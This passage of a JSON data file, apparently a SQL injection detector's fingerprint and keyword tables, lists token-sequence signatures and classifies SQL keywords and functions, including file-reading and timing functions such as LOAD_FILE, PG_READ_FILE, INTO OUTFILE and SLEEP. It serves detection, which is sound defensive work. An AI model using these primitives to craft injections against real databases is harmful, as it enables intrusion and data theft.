"vBs,f", "vBs;", "vBs;c", "vBsB(", "vBsB1", "vBsBf", "vBsBn", "vBsBs", "vBsBv", "vBsU(", "vBsUE", "vBsc", "vBsk(", "vBsk1", "vBskf", "vBskn", "vBsks", "vBskv", "vBso(", "vBso1", "vBsof", "vBson", "vBsos", "vBsov", "vBv", "vBv&(", "vBv&1", "vBv&f", "vBv&n", "vBv&s", "vBv&v", "vBv,(", "vBv,f", "vBv;", "vBv;c", "vBvB(", "vBvB1", "vBvBf", "vBvBn", "vBvBs", "vBvBv", "vBvU(", "vBvUE", "vBvc", "vBvk(", "vBvk1", "vBvkf", "vBvkn", "vBvks", "vBvkv", "vBvo(", "vBvof", "vBvos", "vE(1)", "vE(1o", "vE(f(", "vE(n)", "vE(no", "vE(s)", "vE(so", "vE(v)", "vE(vo", "vE1;T", "vE1T(", "vE1T1", "vE1Tf", "vE1Tn", "vE1Ts", "vE1Tv", "vE1UE", "vE1c", "vE1o(", "vE1of", "vE1os", "vE1ov", "vEU(1", "vEU(f", "vEU(n", "vEU(s", "vEU(v", "vEU1,", "vEU1c", "vEU1o", "vEUEf", "vEUEk", "vEUf(", "vEUs,", "vEUsc", "vEUso", "vEUv,", "vEUvc", "vEUvo", "vEf()", "vEf(1", "vEf(f", "vEf(n", "vEf(s", "vEf(v", "vEk(1", "vEk(E", "vEk(f", "vEk(n", "vEk(s", "vEk(v", "vEk1;", "vEk1T", "vEk1U", "vEk1c", "vEk1o", "vEkU(", "vEkU1", "vEkUE", "vEkUf", "vEkUs", "vEkUv", "vEkf(", "vEkn;", "vEknE", "vEknT", "vEknU", "vEknc", "vEkok", "vEks;", "vEksT", "vEksU", "vEksc", "vEkso", "vEkv;", "vEkvT", "vEkvU", "vEkvc", "vEkvo", "vEn;T", "vEnEn", "vEnT(", "vEnT1", "vEnTf", "vEnTn", "vEnTs", "vEnTv", "vEnUE", "vEnc", "vEno(", "vEnof", "vEnos", "vEnov", "vEokn", "vEs;T", "vEsT(", "vEsT1", "vEsTf", "vEsTn", "vEsTs", "vEsTv", "vEsUE", "vEsc", "vEso(", "vEso1", "vEsof", "vEson", "vEsos", "vEsov", "vEv;T", "vEvT(", "vEvT1", "vEvTf", "vEvTn", "vEvTs", "vEvTv", "vEvUE", "vEvc", "vEvo(", "vEvof", "vEvos", "vT(1)", "vT(1o", "vT(f(", "vT(n)", "vT(no", "vT(s)", "vT(so", "vT(v)", "vT(vo", "vT1(f", "vT1o(", "vT1of", "vT1os", "vT1ov", "vTE(1", "vTE(f", "vTE(n", "vTE(s", "vTE(v", "vTE1n", "vTE1o", "vTEf(", "vTEk(", "vTEk1", "vTEkf", "vTEkn", "vTEks", "vTEkv", "vTEnn", "vTEno", "vTEsn", "vTEso", "vTEvn", "vTEvo", "vTTnE", "vTTnT", "vTTnk", "vTTnn", "vTf()", "vTf(1", "vTf(f", "vTf(n", "vTf(s", "vTf(v", "vTn(1", "vTn(f", "vTn(s", "vTn(v", "vTn1c", "vTn1o", "vTn;E", "vTn;T", "vTn;n", "vTnE(", "vTnE1", "vTnEf", "vTnEn", "vTnEs", "vTnEv", "vTnT(", "vTnT1", "vTnTf", "vTnTn", "vTnTs", "vTnTv", "vTnf(", "vTnkn", "vTnn:", "vTnnc", "vTnno", "vTno(", "vTnof", "vTnos", "vTnov", "vTnsc", "vTnso", "vTnvc", "vTnvo", "vTs(f", "vTso(", "vTso1", "vTsof", "vTson", "vTsos", "vTsov", "vTv(1", "vTv(f", "vTvo(", "vTvof", "vTvos", "vU", "vU(1)", "vU(1o", "vU(E(", "vU(E1", "vU(Ef", "vU(Ek", "vU(En", "vU(Es", "vU(Ev", "vU(f(", "vU(n)", "vU(no", "vU(s)", "vU(so", "vU(v)", "vU(vo", "vU1,(", "vU1,f", "vU1c", "vU1o(", "vU1of", "vU1os", "vU1ov", "vU;", "vU;c", "vUE", "vUE(1", "vUE(E", "vUE(f", "vUE(n", "vUE(o", "vUE(s", "vUE(v", "vUE1", "vUE1&", "vUE1(", "vUE1)", "vUE1,", "vUE1;", "vUE1B", "vUE1U", "vUE1c", "vUE1f", "vUE1k", "vUE1n", "vUE1o", "vUE1s", "vUE1v", "vUE;", "vUE;c", "vUEc", "vUEf", "vUEf(", "vUEf,", "vUEf;", "vUEfc", "vUEk", "vUEk(", "vUEk1", "vUEk;", "vUEkc", "vUEkf", "vUEkn", "vUEko", "vUEks", "vUEkv", "vUEn", "vUEn&", "vUEn(", "vUEn)", "vUEn,", "vUEn1", "vUEn;", "vUEnB", "vUEnU", "vUEnc", "vUEnf", "vUEnk", "vUEno", "vUEns", "vUEok", "vUEon", "vUEs", "vUEs&", "vUEs(", "vUEs)", "vUEs,", "vUEs1", "vUEs;", "vUEsB", "vUEsU", "vUEsc", "vUEsf", "vUEsk", "vUEso", "vUEsv", "vUEv", "vUEv&", "vUEv(", "vUEv)", "vUEv,", "vUEv;", "vUEvB", "vUEvU", "vUEvc", "vUEvf", "vUEvk", "vUEvn", "vUEvo", "vUEvs", "vUTn(", "vUTn1", "vUTnf", "vUTnn", "vUTns", "vUTnv", "vUc", "vUf()", "vUf(1", "vUf(f", "vUf(n", "vUf(s", "vUf(v", "vUk(E", "vUo(E", "vUon(", "vUon1", "vUonf", "vUons", "vUs,(", "vUs,f", "vUsc", "vUso(", "vUso1", "vUsof", "vUson", "vUsos", "vUsov", "vUv,(", "vUv,f", "vUvc", "vUvo(", "vUvof", "vUvos", "vc", "vf()1", "vf()U", "vf()f", "vf()k", "vf()n", "vf()o", "vf()s", "vf()v", "vf(1)", "vf(1n", "vf(1o", "vf(E(", "vf(E1", "vf(Ef", "vf(Ek", "vf(En", "vf(Es", "vf(Ev", "vf(f(", "vf(n)", "vf(n,", "vf(no", "vf(s)", "vf(so", "vf(v)", "vf(vo", "vk(1)", "vk(1o", "vk(f(", "vk(n)", "vk(no", "vk(s)", "vk(so", "vk(v)", "vk(vo", "vk)&(", "vk)&1", "vk)&f", "vk)&n", "vk)&s", "vk)&v", "vk);E", "vk);T", "vk)B(", "vk)B1", "vk)Bf", "vk)Bn", "vk)Bs", "vk)Bv", "vk)E(", "vk)E1", "vk)Ef", "vk)Ek", "vk)En", "vk)Es", "vk)Ev", "vk)UE", "vk)f(", "vk)o(", "vk)of", "vk1", "vk1&(", "vk1&1", "vk1&f", "vk1&n", "vk1&s", "vk1&v", "vk1;", "vk1;E", "vk1;T", "vk1;c", "vk1B(", "vk1B1", "vk1Bf", "vk1Bn", "vk1Bs", "vk1Bv", "vk1E(", "vk1E1", "vk1Ef", "vk1Ek", "vk1En", "vk1Es", "vk1Ev", "vk1U(", "vk1UE", "vk1c", "vk1o(", "vk1of", "vk1os", "vk1ov", "vkUE(", "vkUE1", "vkUEf", "vkUEk", "vkUEn", "vkUEs", "vkUEv", "vkf()", "vkf(1", "vkf(f", "vkf(n", "vkf(s", "vkf(v", "vkn", "vkn&(", "vkn&1", "vkn&f", "vkn&n", "vkn&s", "vkn&v", "vkn;", "vkn;E", "vkn;T", "vkn;c", "vknB(", "vknB1", "vknBf", "vknBn", "vknBs", "vknBv", "vknE(", "vknE1", "vknEf", "vknEn", "vknEs", "vknEv", "vknU(", "vknUE", "vknc", "vks", "vks&(", "vks&1", "vks&f", "vks&n", "vks&s", "vks&v", "vks;", "vks;E", "vks;T", "vks;c", "vksB(", "vksB1", "vksBf", "vksBn", "vksBs", "vksBv", "vksE(", "vksE1", "vksEf", "vksEk", "vksEn", "vksEs", "vksEv", "vksU(", "vksUE", "vksc", "vkso(", "vkso1", "vksof", "vkson", "vksos", "vksov", "vkv", "vkv&(", "vkv&1", "vkv&f", "vkv&n", "vkv&s", "vkv&v", "vkv;", "vkv;E", "vkv;T", "vkv;c", "vkvB(", "vkvB1", "vkvBf", "vkvBn", "vkvBs", "vkvBv", "vkvE(", "vkvE1", "vkvEf", "vkvEk", "vkvEn", "vkvEs", "vkvEv", "vkvU(", "vkvUE", "vkvc", "vkvo(", "vkvof", "vkvos", "vo(1&", "vo(1)", "vo(1,", "vo(1o", "vo(E(", "vo(E1", "vo(EE", "vo(Ef", "vo(Ek", "vo(En", "vo(Eo", "vo(Es", "vo(Ev", "vo(f(", "vo(n&", "vo(n)", "vo(n,", "vo(no", "vo(s&", "vo(s)", "vo(s,", "vo(so", "vo(v&", "vo(v)", "vo(v,", "vo(vo", "voU(E", "voUEk", "voUEn", "vof()", "vof(1", "vof(E", "vof(f", "vof(n", "vof(s", "vof(v", "vok&(", "vok&1", "vok&f", "vok&n", "vok&s", "vok&v", "vok(1", "vok(f", "vok(n", "vok(s", "vok(v", "vok1c", "vok1o", "vokf(", "voknc", "voko(", "voko1", "vokof", "vokon", "vokos", "vokov", "voksc", "vokso", "vokvc", "vokvo", "vos", "vos&(", "vos&1", "vos&E", "vos&U", "vos&f", "vos&k", "vos&n", "vos&s", "vos&v", "vos(E", "vos(U", "vos)&", "vos),", "vos);", "vos)B", "vos)E", "vos)U", "vos)c", "vos)f", "vos)k", "vos)o", "vos,(", "vos,f", "vos1(", "vos1U", "vos1f", "vos1n", "vos1s", "vos1v", "vos;", "vos;E", "vos;T", "vos;c", "vos;n", "vosA(", "vosAf", "vosAs", "vosAt", "vosAv", "vosB(", "vosB1", "vosBE", "vosBf", "vosBn", "vosBs", "vosBv", "vosE(", "vosE1", "vosEU", "vosEf", "vosEk", "vosEn", "vosEo", "vosEs", "vosEv", "vosT(", "vosT1", "vosTE", "vosTT", "vosTf", "vosTn", "vosTs", "vosTv", "vosU", "vosU(", "vosU1", "vosU;", "vosUE", "vosUT", "vosUc", "vosUf", "vosUk", "vosUo", "vosUs", "vosUv", "vosc", "vosf(", "vosk(", "vosk)", "vosk1", "voskB", "voskU", "voskf", "voskn", "vosks", "voskv", "vosv(", "vosvU", "vosvf", "vosvo", "vosvs" ], "keywords": { "!!": "o", "!<": "o", "!=": "o", "!>": "o", "%=": "o", "&&": "&", "&=": "o", "*=": "o", "+=": "o", "-=": "o", "/=": "o", "::": "o", ":=": "o", "<<": "o", "<=": "o", "<>": "o", "<@": "o", ">=": "o", ">>": "o", "@>": "o", "ABORT": "k", "ABS": "f", "ACCESSIBLE": "k", "ACOS": "f", "ADDDATE": "f", "ADDTIME": "f", "AES_DECRYPT": "f", "AES_ENCRYPT": "f", "AGAINST": "k", "AGE": "f", "ALL_USERS": "k", "ALTER": "k", "ALTER DOMAIN": "k", "ALTER TABLE": "k", "ANALYZE": "k", "AND": "&", "ANY": "f", "ANYARRAY": "t", "ANYELEMENT": "t", "ANYNONARRY": "t", "APPLOCK_MODE": "f", "APPLOCK_TEST": "f", "APP_NAME": "f", "ARRAY_AGG": "f", "ARRAY_CAT": "f", "ARRAY_DIM": "f", "ARRAY_FILL": "f", "ARRAY_LENGTH": "f", "ARRAY_LOWER": "f", "ARRAY_NDIMS": "f", "ARRAY_PREPEND": "f", "ARRAY_TO_JSON": "f", "ARRAY_TO_STRING": "f", "ARRAY_UPPER": "f", "AS": "k", "ASC": "k", "ASCII": "f", "ASENSITIVE": "k", "ASIN": "f", "ASSEMBLYPROPERTY": "f", "ASYMKEY_ID": "f", "AT TIME": "n", "AT TIME ZONE": "k", "ATAN": "f", "ATAN2": "f", "AUTOINCREMENT": "k", "AVG": "f", "BEFORE": "k", "BEGIN": "T", "BEGIN DECLARE": "T", "BEGIN GOTO": "T", "BEGIN TRY": "T", "BEGIN TRY DECLARE": "T", "BENCHMARK": "f", "BETWEEN": "o", "BIGINT": "t", "BIGSERIAL": "t", "BIN": "f", "BINARY": "t", "BINARY_DOUBLE_INFINITY": "1", "BINARY_DOUBLE_NAN": "1", "BINARY_FLOAT_INFINITY": "1", "BINARY_FLOAT_NAN": "1", "BINBINARY": "f", "BIT_AND": "f", "BIT_COUNT": "f", "BIT_LENGTH": "f", "BIT_OR": "f", "BIT_XOR": "f", "BLOB": "k", "BOOLEAN": "t", "BOOL_AND": "f", "BOOL_OR": "f", "BOTH": "k", "BTRIM": "f", "BY": "n", "BYTEA": "t", "CALL": "T", "CASCADE": "k", "CASE": "E", "CAST": "f", "CBOOL": "f", "CBRT": "f", "CBYTE": "f", "CCUR": "f", "CDATE": "f", "CDBL": "f", "CEIL": "f", "CEILING": "f", "CERTENCODED": "f", "CERTPRIVATEKEY": "f", "CERT_ID": "f", "CERT_PROPERTY": "f", "CHANGE": "k", "CHANGES": "f", "CHAR": "f", "CHARACTER": "t", "CHARACTER VARYING": "t", "CHARACTER_LENGTH": "f", "CHARINDEX": "f", "CHARSET": "f", "CHAR_LENGTH": "f", "CHDIR": "f", "CHDRIVE": "f", "CHECK": "n", "CHECKSUM_AGG": "f", "CHOOSE": "f", "CHR": "f", "CINT": "f", "CLNG": "f", "CLOCK_TIMESTAMP": "f", "COALESCE": "f", "COERCIBILITY": "f", "COLLATE": "A", "COLLATION": "f", "COLLATIONPROPERTY": "f", "COLUMN": "k", "COLUMNPROPERTY": "f", "COLUMNS_UPDATED": "f", "COL_LENGTH": "f", "COL_NAME": "f", "COMPRESS": "f", "CONCAT": "f", "CONCAT_WS": "f", "CONDITION": "k", "CONNECTION_ID": "f", "CONSTRAINT": "k", "CONTINUE": "k", "CONV": "f", "CONVERT": "f", "CONVERT_FROM": "f", "CONVERT_TO": "f", "CONVERT_TZ": "f", "COS": "f", "COT": "f", "COUNT": "f", "COUNT_BIG": "k", "CRC32": "f", "CREATE": "E", "CREATE OR": "n", "CREATE OR REPLACE": "T", "CROSS": "n", "CROSS JOIN": "k", "CSNG": "f", "CSTRING": "t", "CTXSYS.DRITHSX.SN": "f", "CUME_DIST": "f", "CURDATE": "f", "CURDIR": "f", "CURRENT DATE": "v", "CURRENT DEGREE": "v", "CURRENT FUNCTION": "v", "CURRENT FUNCTION PATH": "v", "CURRENT PATH": "v", "CURRENT SCHEMA": "v", "CURRENT SERVER": "v", "CURRENT TIME": "v", "CURRENT TIMEZONE": "v", "CURRENTUSER": "f", "CURRENT_DATABASE": "f", "CURRENT_DATE": "v", "CURRENT_PATH": "v", "CURRENT_QUERY": "f", "CURRENT_SCHEMA": "f", "CURRENT_SCHEMAS": "f", "CURRENT_SERVER": "v", "CURRENT_SETTING": "f", "CURRENT_TIME": "v", "CURRENT_TIMESTAMP": "v", "CURRENT_TIMEZONE": "v", "CURRENT_USER": "v", "CURRVAL": "f", "CURSOR": "k", "CURSOR_STATUS": "f", "CURTIME": "f", "CVAR": "f", "DATABASE": "n", "DATABASEPROPERTYEX": "f", "DATABASES": "k", "DATABASE_PRINCIPAL_ID": "f", "DATALENGTH": "f", "DATE": "f", "DATEADD": "f", "DATEDIFF": "f", "DATEFROMPARTS": "f", "DATENAME": "f", "DATEPART": "f", "DATESERIAL": "f", "DATETIME2FROMPARTS": "f", "DATETIMEFROMPARTS": "f", "DATETIMEOFFSETFROMPARTS": "f", "DATEVALUE": "f", "DATE_ADD": "f", "DATE_FORMAT": "f", "DATE_PART": "f", "DATE_SUB": "f", "DATE_TRUNC": "f", "DAVG": "f", "DAY": "f", "DAYNAME": "f", "DAYOFMONTH": "f", "DAYOFWEEK": "f", "DAYOFYEAR": "f", "DAY_HOUR": "k", "DAY_MICROSECOND": "k", "DAY_MINUTE": "k", "DAY_SECOND": "k", "DBMS_LOCK.SLEEP": "f", "DBMS_PIPE.RECEIVE_MESSAGE": "f", "DBMS_UTILITY.SQLID_TO_SQLHASH": "f", "DB_ID": "f", "DB_NAME": "f", "DCOUNT": "f", "DEC": "k", "DECIMAL": "t", "DECLARE": "T", "DECODE": "f", "DECRYPTBYASMKEY": "f", "DECRYPTBYCERT": "f", "DECRYPTBYKEY": "f", "DECRYPTBYKEYAUTOCERT": "f", "DECRYPTBYPASSPHRASE": "f", "DEFAULT": "k", "DEGREES": "f", "DELAY": "k", "DELAYED": "k", "DELETE": "T", "DENSE_RANK": "f", "DESC": "k", "DESCRIBE": "k", "DES_DECRYPT": "f", "DES_ENCRYPT": "f", "DETERMINISTIC": "k", "DFIRST": "f", "DIFFERENCE": "f", "DISTINCT": "k", "DISTINCTROW": "k", "DIV": "o", "DLAST": "f", "DLOOKUP": "f", "DMAX": "f", "DMIN": "f", "DO": "n", "DOUBLE": "t", "DOUBLE PRECISION": "t", "DROP": "T", "DSUM": "f", "DUAL": "n", "EACH": "k", "ELSE": "k", "ELSEIF": "k", "ELT": "f", "ENCLOSED": "k", "ENCODE": "f", "ENCRYPT": "f", "ENCRYPTBYASMKEY": "f", "ENCRYPTBYCERT": "f", "ENCRYPTBYKEY": "f", "ENCRYPTBYPASSPHRASE": "f", "ENUM_FIRST": "f", "ENUM_LAST": "f", "ENUM_RANGE": "f", "EOMONTH": "f", "EQV": "o", "ESCAPED": "k", "EVENTDATA": "f", "EXCEPT": "U", "EXEC": "T", "EXECUTE": "T", "EXECUTE AS": "E", "EXECUTE AS LOGIN": "E", "EXISTS": "f", "EXIT": "k", "EXP": "f", "EXPLAIN": "k", "EXPORT_SET": "f", "EXTRACT": "f", "EXTRACTVALUE": "f", "EXTRACT_VALUE": "f", "FALSE": "1", "FETCH": "k", "FIELD": "f", "FILEDATETIME": "f", "FILEGROUPPROPERTY": "f", "FILEGROUP_ID": "f", "FILEGROUP_NAME": "f", "FILELEN": "f", "FILEPROPERTY": "f", "FILETOBLOB": "f", "FILETOCLOB": "f", "FILE_ID": "f", "FILE_IDEX": "f", "FILE_NAME": "f", "FIND_IN_SET": "f", "FIRST_VALUE": "f", "FLOAT": "t", "FLOAT4": "t", "FLOAT8": "t", "FLOOR": "f", "FN_VIRTUALFILESTATS": "f", "FOR": "n", "FOR UPDATE": "k", "FOR UPDATE NOWAIT": "k", "FOR UPDATE OF": "k", "FOR UPDATE SKIP": "k", "FOR UPDATE SKIP LOCKED": "k", "FOR UPDATE WAIT": "k", "FORCE": "k", "FOREIGN": "k", "FORMAT": "f", "FOUND_ROWS": "f", "FROM": "k", "FROM_BASE64": "f", "FROM_DAYS": "f", "FROM_UNIXTIME": "f", "FULL JOIN": "k", "FULL OUTER": "k", "FULL OUTER JOIN": "k", "FULLTEXT": "k", "FULLTEXTCATALOGPROPERTY": "f", "FULLTEXTSERVICEPROPERTY": "f", "FUNCTION": "k", "GENERATE_SERIES": "f", "GENERATE_SUBSCRIPTS": "f", "GETATTR": "f", "GETDATE": "f", "GETUTCDATE": "f", "GET_BIT": "f", "GET_BYTE": "f", "GET_FORMAT": "f", "GET_LOCK": "f", "GO": "T", "GOTO": "T", "GRANT": "k", "GREATEST": "f", "GROUP": "n", "GROUP BY": "B", "GROUPING": "f", "GROUPING_ID": "f", "GROUP_CONCAT": "f", "HANDLER": "T", "HASHBYTES": "f", "HAS_PERMS_BY_NAME": "f", "HAVING": "B", "HEX": "f", "HIGH_PRIORITY": "k", "HOST_NAME": "f", "HOUR": "f", "HOUR_MICROSECOND": "k", "HOUR_MINUTE": "k", "HOUR_SECOND": "k", "IDENTIFY": "f", "IDENT_CURRENT": "f", "IDENT_INCR": "f", "IDENT_SEED": "f", "IF": "f", "IF EXISTS": "f", "IF NOT": "f", "IF NOT EXISTS": "f", "IFF": "f", "IFNULL": "f", "IGNORE": "k", "IIF": "f", "IN": "k", "IN BOOLEAN": "n", "IN BOOLEAN MODE": "k", "INDEX": "k", "INDEXKEY_PROPERTY": "f", "INDEXPROPERTY": "f", "INDEX_COL": "f", "INET_ATON": "f", "INET_NTOA": "f", "INFILE": "k", "INITCAP": "f", "INNER": "k", "INNER JOIN": "k", "INOUT": "k", "INSENSITIVE": "k", "INSERT": "E", "INSERT DELAYED": "E", "INSERT DELAYED INTO": "T", "INSERT HIGH_PRIORITY": "E", "INSERT HIGH_PRIORITY INTO": "T", "INSERT IGNORE": "E", "INSERT IGNORE INTO": "T", "INSERT INTO": "T", "INSERT LOW_PRIORITY": "E", "INSERT LOW_PRIORITY INTO": "T", "INSTR": "f", "INSTRREV": "f", "INT": "t", "INT1": "t", "INT2": "t", "INT3": "t", "INT4": "t", "INT8": "t", "INTEGER": "t", "INTERSECT": "U", "INTERSECT ALL": "U", "INTERVAL": "k", "INTO": "k", "INTO DUMPFILE": "k", "INTO OUTFILE": "k", "IS": "o", "IS DISTINCT": "n", "IS DISTINCT FROM": "o", "IS NOT": "o", "IS NOT DISTINCT": "n", "IS NOT DISTINCT FROM": "o", "ISDATE": "f", "ISEMPTY": "f", "ISFINITE": "f", "ISNULL": "f", "ISNUMERIC": "f", "IS_FREE_LOCK": "f", "IS_MEMBER": "f", "IS_OBJECTSIGNED": "f", "IS_ROLEMEMBER": "f", "IS_SRVROLEMEMBER": "f", "IS_USED_LOCK": "f", "ITERATE": "k", "JOIN": "k", "JSON_KEYS": "f", "JULIANDAY": "f", "JUSTIFY_DAYS": "f", "JUSTIFY_HOURS": "f", "JUSTIFY_INTERVAL": "f", "KEYS": "k", "KEY_GUID": "f", "KEY_ID": "f", "KILL": "k", "LAG": "f", "LASTVAL": "f", "LAST_INSERT_ID": "f", "LAST_INSERT_ROWID": "f", "LAST_VALUE": "f", "LCASE": "f", "LEAD": "f", "LEADING": "k", "LEAST": "f", "LEAVE": "k", "LEFT": "f", "LEFT JOIN": "k", "LEFT OUTER": "k", "LEFT OUTER JOIN": "k", "LENGTH": "f", "LIKE": "o", "LIMIT": "B", "LINEAR": "k", "LINES": "k", "LN": "f", "LOAD": "k", "LOAD DATA": "T", "LOAD XML": "T", "LOAD_EXTENSION": "f", "LOAD_FILE": "f", "LOCALTIME": "v", "LOCALTIMESTAMP": "v", "LOCATE": "f", "LOCK": "n", "LOCK IN": "n", "LOCK IN SHARE": "n", "LOCK IN SHARE MODE": "k", "LOCK TABLE": "k", "LOCK TABLES": "k", "LOG": "f", "LOG10": "f", "LOG2": "f", "LONGBLOB": "k", "LONGTEXT": "k", "LOOP": "k", "LOWER": "f", "LOWER_INC": "f", "LOWER_INF": "f", "LOW_PRIORITY": "k", "LPAD": "f", "LTRIM": "f", "MAKEDATE": "f", "MAKE_SET": "f", "MASKLEN": "f", "MASTER_BIND": "k", "MASTER_POS_WAIT": "f", "MASTER_SSL_VERIFY_SERVER_CERT": "k", "MATCH": "k", "MAX": "f", "MAXVALUE": "k", "MD5": "f", "MEDIUMBLOB": "k", "MEDIUMINT": "k", "MEDIUMTEXT": "k", "MERGE": "k", "MICROSECOND": "f", "MID": "f", "MIDDLEINT": "k", "MIN": "f", "MINUTE": "f", "MINUTE_MICROSECOND": "k", "MINUTE_SECOND": "k", "MKDIR": "f", "MOD": "o", "MODE": "n", "MODIFIES": "k", "MONEY": "t", "MONTH": "f", "MONTHNAME": "f", "NAME_CONST": "f", "NATURAL": "n", "NATURAL FULL": "k", "NATURAL FULL OUTER JOIN": "k", "NATURAL INNER": "k", "NATURAL JOIN": "k", "NATURAL LEFT": "k", "NATURAL LEFT OUTER": "k", "NATURAL LEFT OUTER JOIN": "k", "NATURAL OUTER": "k", "NATURAL RIGHT": "k", "NATURAL RIGHT OUTER JOIN": "k", "NETMASK": "f", "NEXT VALUE": "n", "NEXT VALUE FOR": "k", "NEXTVAL": "f", "NOT": "o", "NOT BETWEEN": "o", "NOT IN": "k", "NOT LIKE": "o", "NOT REGEXP": "o", "NOT RLIKE": "o", "NOT SIMILAR": "o", "NOT SIMILAR TO": "o", "NOTNULL": "k", "NOW": "f", "NOWAIT": "k", "NO_WRITE_TO_BINLOG": "k", "NTH_VALUE": "f", "NTILE": "f", "NULL": "v", "NULLIF": "f", "NUMERIC": "t", "NZ": "f", "OBJECTPROPERTY": "f", "OBJECTPROPERTYEX": "f", "OBJECT_DEFINITION": "f", "OBJECT_ID": "f", "OBJECT_NAME": "f", "OBJECT_SCHEMA_NAME": "f", "OCT": "f", "OCTET_LENGTH": "f", "OFFSET": "k", "OID": "t", "OLD_PASSWORD": "f", "ONE_SHOT": "k", "OPEN": "k", "OPENDATASOURCE": "f", "OPENQUERY": "f", "OPENROWSET": "f", "OPENXML": "f", "OPTIMIZE": "k", "OPTION": "k", "OPTIONALLY": "k", "OR": "&", "ORD": "f", "ORDER": "n", "ORDER BY": "B", "ORIGINAL_DB_NAME": "f", "ORIGINAL_LOGIN": "f", "OUT": "n", "OUTER": "n", "OUTFILE": "k", "OVERLAPS": "f", "OVERLAY": "f", "OWN3D": "k", "OWN3D BY": "B", "PARSENAME": "f", "PARTITION": "k", "PARTITION BY": "B", "PASSWORD": "n", "PATHINDEX": "f", "PATINDEX": "f", "PERCENTILE_COUNT": "f", "PERCENTILE_DISC": "f", "PERCENTILE_RANK": "f", "PERCENT_RANK": "f", "PERIOD_ADD": "f", "PERIOD_DIFF": "f", "PERMISSIONS": "f", "PG_ADVISORY_LOCK": "f", "PG_BACKEND_PID": "f", "PG_CANCEL_BACKEND": "f", "PG_CLIENT_ENCODING": "f", "PG_CONF_LOAD_TIME": "f", "PG_CREATE_RESTORE_POINT": "f", "PG_HAS_ROLE": "f", "PG_IS_IN_RECOVERY": "f", "PG_IS_OTHER_TEMP_SCHEMA": "f", "PG_LISTENING_CHANNELS": "f", "PG_LS_DIR": "f", "PG_MY_TEMP_SCHEMA": "f", "PG_POSTMASTER_START_TIME": "f", "PG_READ_BINARY_FILE": "f", "PG_READ_FILE": "f", "PG_RELOAD_CONF": "f", "PG_ROTATE_LOGFILE": "f", "PG_SLEEP": "f", "PG_START_BACKUP": "f", "PG_STAT_FILE": "f", "PG_STOP_BACKUP": "f", "PG_SWITCH_XLOG": "f", "PG_TERMINATE_BACKEND": "f", "PG_TRIGGER_DEPTH": "f", "PI": "f", "POSITION": "f", "POW": "f", "POWER": "f", "PRECISION": "k", "PREVIOUS VALUE": "n", "PREVIOUS VALUE FOR": "k", "PRIMARY": "k", "PRINT": "T", "PROCEDURE": "k", "PROCEDURE ANALYSE": "f", "PUBLISHINGSERVERNAME": "f", "PURGE": "k", "PWDCOMPARE": "f", "PWDENCRYPT": "f", "QUARTER": "f", "QUOTE": "f", "QUOTENAME": "f", "QUOTE_IDENT": "f", "QUOTE_LITERAL": "f", "QUOTE_NULLABLE": "f", "RADIANS": "f", "RAISEERROR": "E", "RAND": "f", "RANDOM": "f", "RANDOMBLOB": "f", "RANGE": "k", "RANK": "f", "READ": "k", "READ WRITE": "k", "READS": "k", "READ_WRITE": "k", "REAL": "t", "REFERENCES": "k", "REGCLASS": "t", "REGCONFIG": "t", "REGDICTIONARY": "t", "REGEXP": "o", "REGEXP_INSTR": "f", "REGEXP_MATCHES": "f", "REGEXP_REPLACE": "f", "REGEXP_SPLIT_TO_ARRAY": "f", "REGEXP_SPLIT_TO_TABLE": "f", "REGEXP_SUBSTR": "f", "REGOPER": "t", "REGOPERATOR": "t", "REGPROC": "t", "REGPROCEDURE": "t", "REGTYPE": "t", "RELEASE": "k", "RELEASE_LOCK": "f", "RENAME": "k", "REPEAT": "k", "REPLACE": "k", "REPLICATE": "f", "REQUIRE": "k", "RESIGNAL": "k", "RESTRICT": "k", "RETURN": "k", "REVERSE": "f", "REVOKE": "k", "RIGHT": "n", "RIGHT JOIN": "k", "RIGHT OUTER": "k", "RIGHT OUTER JOIN": "k", "RLIKE": "o", "ROUND": "f", "ROW": "f", "ROW_COUNT": "f", "ROW_NUMBER": "f", "ROW_TO_JSON": "f", "RPAD": "f", "RTRIM": "f", "SCHAMA_NAME": "f", "SCHEMA": "k", "SCHEMAS": "k", "SCHEMA_ID": "f", "SCOPE_IDENTITY": "f", "SECOND_MICROSECOND": "k", "SEC_TO_TIME": "f", "SELECT": "E", "SELECT ALL": "E", "SELECT DISTINCT": "E", "SENSITIVE": "k", "SEPARATOR": "k", "SERIAL": "t", "SERIAL2": "t", "SERIAL4": "t", "SERIAL8": "t", "SERVERPROPERTY": "f", "SESSION_USER": "f", "SET": "E", "SETATTR": "f", "SETSEED": "f", "SETVAL": "f", "SET_BIT": "f", "SET_BYTE": "f", "SET_CONFIG": "f", "SET_MASKLEN": "f", "SHA": "f", "SHA1": "f", "SHA2": "f", "SHOW": "n", "SHUTDOWN": "T", "SIGN": "f", "SIGNAL": "k", "SIGNBYASMKEY": "f", "SIGNBYCERT": "f", "SIMILAR": "k", "SIMILAR TO": "o", "SIN": "f", "SLEEP": "f", "SMALLDATETIMEFROMPARTS": "f", "SMALLINT": "t", "SMALLSERIAL": "t", "SOME": "f", "SOUNDEX": "f", "SOUNDS": "o", "SOUNDS LIKE": "o", "SPACE": "f", "SPATIAL": "k", "SPECIFIC": "k", "SPLIT_PART": "f", "SQL": "k", "SQLEXCEPTION": "k", "SQLITE_VERSION": "f", "SQLSTATE": "k", "SQLWARNING": "k", "SQL_BIG_RESULT": "k", "SQL_BUFFER_RESULT": "k", "SQL_CACHE": "k", "SQL_CALC_FOUND_ROWS": "k", "SQL_NO_CACHE": "k", "SQL_SMALL_RESULT": "k", "SQL_VARIANT_PROPERTY": "f", "SQRT": "f", "SSL": "k", "STARTING": "k", "STATEMENT_TIMESTAMP": "f", "STATS_DATE": "f", "STDDEV": "f", "STDDEV_POP": "f", "STDDEV_SAMP": "f", "STRAIGHT_JOIN": "k", "STRCMP": "f", "STRCOMP": "f", "STRCONV": "f", "STRING_AGG": "f", "STRING_TO_ARRAY": "f", "STRPOS": "f", "STR_TO_DATE": "f", "STUFF": "f", "SUBDATE": "f", "SUBSTR": "f", "SUBSTRING": "f", "SUBSTRING_INDEX": "f", "SUBTIME": "f", "SUM": "f", "SUSER_ID": "f", "SUSER_NAME": "f", "SUSER_SID": "f", "SUSER_SNAME": "f", "SWITCHOFFET": "f", "SYS.DATABASE_NAME": "n", "SYS.FN_BUILTIN_PERMISSIONS": "f", "SYS.FN_GET_AUDIT_FILE": "f", "SYS.FN_MY_PERMISSIONS": "f", "SYS.STRAGG": "f", "SYSCOLUMNS": "k", "SYSDATE": "f", "SYSDATETIME": "f", "SYSDATETIMEOFFSET": "f", 